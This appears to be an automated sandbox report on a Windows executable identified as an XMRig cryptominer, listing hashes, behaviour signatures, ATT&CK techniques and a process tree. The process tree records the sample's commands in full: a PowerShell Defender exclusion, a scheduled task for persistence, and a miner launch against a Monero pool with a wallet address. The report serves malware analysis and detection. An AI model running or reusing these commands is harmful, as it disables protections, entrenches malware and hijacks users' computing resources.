Overview

overview

10

Static

static

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    97s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-11-2022 19:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f34fab44d1f6f3db482c87cf464a86ed6813805953403425658446990a8a2daf.exe

  • Size

    1.3MB

  • MD5

    442068a8271d880244a03d4d290c75fa

  • SHA1

    bc20dc9ca257c6a0573d521e702cbf0369fdd4b3

  • SHA256

    f34fab44d1f6f3db482c87cf464a86ed6813805953403425658446990a8a2daf

  • SHA512

    a2a17a6b653087200be8b3ca5cfc80fe4db087c4fc57214090326948622e48fe0afeaea7c63a955099501ed6dec3b87328822e398cced151a7d8fc78e5a25f34

  • SSDEEP

    24576:YmK6Q9qEYTewpekHZySOVhP8BCaff7XFf7aiJRw+UjxF:YmK6OqEYT1pek0VFof7ValxxF

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 6 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f34fab44d1f6f3db482c87cf464a86ed6813805953403425658446990a8a2daf.exe
    "C:\Users\Admin\AppData\Local\Temp\f34fab44d1f6f3db482c87cf464a86ed6813805953403425658446990a8a2daf.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:632
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp83CB.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:3512
      • C:\ProgramData\winrar\OWT.exe
        "C:\ProgramData\winrar\OWT.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2228
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2260
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
            5⤵
            • Creates scheduled task(s)
            PID:4864
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1044
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 5064 -s 1284
          4⤵
          • Program crash
          PID:4296
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 412 -p 5064 -ip 5064
    1⤵
      PID:4688

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scripting

    1
    T1064

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Scripting

    1
    T1064

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\winrar\OWT.exe
      Filesize

      1.3MB

      MD5

      442068a8271d880244a03d4d290c75fa

      SHA1

      bc20dc9ca257c6a0573d521e702cbf0369fdd4b3

      SHA256

      f34fab44d1f6f3db482c87cf464a86ed6813805953403425658446990a8a2daf

      SHA512

      a2a17a6b653087200be8b3ca5cfc80fe4db087c4fc57214090326948622e48fe0afeaea7c63a955099501ed6dec3b87328822e398cced151a7d8fc78e5a25f34

      Download Submit
    • C:\ProgramData\winrar\OWT.exe
      Filesize

      1.3MB

      MD5

      442068a8271d880244a03d4d290c75fa

      SHA1

      bc20dc9ca257c6a0573d521e702cbf0369fdd4b3

      SHA256

      f34fab44d1f6f3db482c87cf464a86ed6813805953403425658446990a8a2daf

      SHA512

      a2a17a6b653087200be8b3ca5cfc80fe4db087c4fc57214090326948622e48fe0afeaea7c63a955099501ed6dec3b87328822e398cced151a7d8fc78e5a25f34

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      731e9e4becec0b1ef9caad4b3562d4b4

      SHA1

      6dffb77aba4e92ad5bd4b7c02fdee6f328bcd457

      SHA256

      71c7eca538938fa4d5b470fee41cfe43734e9beb9ae409d5b41111fa1a15c2d5

      SHA512

      841cf559ae5b0feec4be43018717641399b3602a553112e98b07d498f1a44169924466abc7e2313b8e8cf1c0fdc1bb7635e2818aab8269b0ef349a0ba0cd6ae5

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp83CB.tmp.bat
      Filesize

      138B

      MD5

      f3fdc9bd89762fd6edd7600ad2d56388

      SHA1

      3064e1ef31828ee1cac24daf852f4cfe1812bc25

      SHA256

      dac4072b1f8157de02905c8f02487ef8bf8cfc0a4292211cf55c586e30e69216

      SHA512

      74ceeffb1c5681a122c51798cd523749f4c2fc5f36ed92f346806223eabcf1f68aa409fc5af85d3f7f34a6d6e87bde760c3d09c49600fe7a632bab36d4c6d156

      Download Submit
    • memory/632-152-0x00000217FA290000-0x00000217FA2B2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/632-154-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/632-145-0x0000000000000000-mapping.dmp
      Download
    • memory/632-153-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1044-199-0x000001A774870000-0x000001A774890000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1044-186-0x0000000140343234-mapping.dmp
      Download
    • memory/1044-185-0x0000000140000000-0x00000001407C9000-memory.dmp
      Filesize

      7.8MB

      Download
    • memory/1044-198-0x000001A774840000-0x000001A774860000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1044-187-0x0000000140000000-0x00000001407C9000-memory.dmp
      Filesize

      7.8MB

      Download
    • memory/1044-188-0x0000000140000000-0x00000001407C9000-memory.dmp
      Filesize

      7.8MB

      Download
    • memory/1044-197-0x000001A774870000-0x000001A774890000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1044-189-0x000001A7747B0000-0x000001A7747D0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1044-190-0x0000000140000000-0x00000001407C9000-memory.dmp
      Filesize

      7.8MB

      Download
    • memory/1044-196-0x000001A774840000-0x000001A774860000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1044-192-0x000001A774800000-0x000001A774840000-memory.dmp
      Filesize

      256KB

      Download
    • memory/1044-195-0x0000000140000000-0x00000001407C9000-memory.dmp
      Filesize

      7.8MB

      Download
    • memory/2228-174-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2228-169-0x0000000000000000-mapping.dmp
      Download
    • memory/2228-177-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2260-171-0x0000000000000000-mapping.dmp
      Download
    • memory/2592-146-0x0000000000000000-mapping.dmp
      Download
    • memory/3172-139-0x0000000000570000-0x00000000005B3000-memory.dmp
      Filesize

      268KB

      Download
    • memory/3172-140-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3172-149-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3172-148-0x0000000000570000-0x00000000005B3000-memory.dmp
      Filesize

      268KB

      Download
    • memory/3172-147-0x0000000000380000-0x000000000053C000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/3172-144-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3172-143-0x00007FFA7B3D0000-0x00007FFA7B51E000-memory.dmp
      Filesize

      1.3MB

      Download
    • memory/3172-142-0x0000000000380000-0x000000000053C000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/3172-141-0x00007FFA96080000-0x00007FFA960AB000-memory.dmp
      Filesize

      172KB

      Download
    • memory/3172-132-0x0000000000380000-0x000000000053C000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/3172-138-0x00007FFA96FE0000-0x00007FFA97181000-memory.dmp
      Filesize

      1.6MB

      Download
    • memory/3172-137-0x00007FFA7B520000-0x00007FFA7B5DD000-memory.dmp
      Filesize

      756KB

      Download
    • memory/3172-136-0x00007FFA935D0000-0x00007FFA935E2000-memory.dmp
      Filesize

      72KB

      Download
    • memory/3172-135-0x00007FFA96970000-0x00007FFA96A0E000-memory.dmp
      Filesize

      632KB

      Download
    • memory/3172-134-0x00007FFA7B670000-0x00007FFA7B71A000-memory.dmp
      Filesize

      680KB

      Download
    • memory/3512-151-0x0000000000000000-mapping.dmp
      Download
    • memory/4864-176-0x0000000000000000-mapping.dmp
      Download
    • memory/5064-166-0x00007FFA96080000-0x00007FFA960AB000-memory.dmp
      Filesize

      172KB

      Download
    • memory/5064-178-0x00007FFA95E90000-0x00007FFA95EB7000-memory.dmp
      Filesize

      156KB

      Download
    • memory/5064-179-0x00007FFA80C40000-0x00007FFA80C75000-memory.dmp
      Filesize

      212KB

      Download
    • memory/5064-180-0x00007FFA77080000-0x00007FFA77182000-memory.dmp
      Filesize

      1.0MB

      Download
    • memory/5064-181-0x00007FFA97600000-0x00007FFA9766B000-memory.dmp
      Filesize

      428KB

      Download
    • memory/5064-182-0x00007FFA94A80000-0x00007FFA94ABB000-memory.dmp
      Filesize

      236KB

      Download
    • memory/5064-183-0x0000000000C00000-0x0000000000DBC000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/5064-184-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5064-173-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5064-172-0x00000000036D0000-0x0000000003713000-memory.dmp
      Filesize

      268KB

      Download
    • memory/5064-168-0x00007FFA7B3D0000-0x00007FFA7B51E000-memory.dmp
      Filesize

      1.3MB

      Download
    • memory/5064-167-0x0000000000C00000-0x0000000000DBC000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/5064-165-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5064-164-0x00007FFA96FE0000-0x00007FFA97181000-memory.dmp
      Filesize

      1.6MB

      Download
    • memory/5064-191-0x00007FFA75B10000-0x00007FFA75C7A000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/5064-163-0x00007FFA7B520000-0x00007FFA7B5DD000-memory.dmp
      Filesize

      756KB

      Download
    • memory/5064-193-0x0000000000C00000-0x0000000000DBC000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/5064-194-0x00007FFA79FD0000-0x00007FFA7AA91000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5064-162-0x00007FFA935D0000-0x00007FFA935E2000-memory.dmp
      Filesize

      72KB

      Download
    • memory/5064-161-0x00007FFA96970000-0x00007FFA96A0E000-memory.dmp
      Filesize

      632KB

      Download
    • memory/5064-160-0x00007FFA7B670000-0x00007FFA7B71A000-memory.dmp
      Filesize

      680KB

      Download
    • memory/5064-158-0x0000000000C00000-0x0000000000DBC000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/5064-155-0x0000000000000000-mapping.dmp
      Download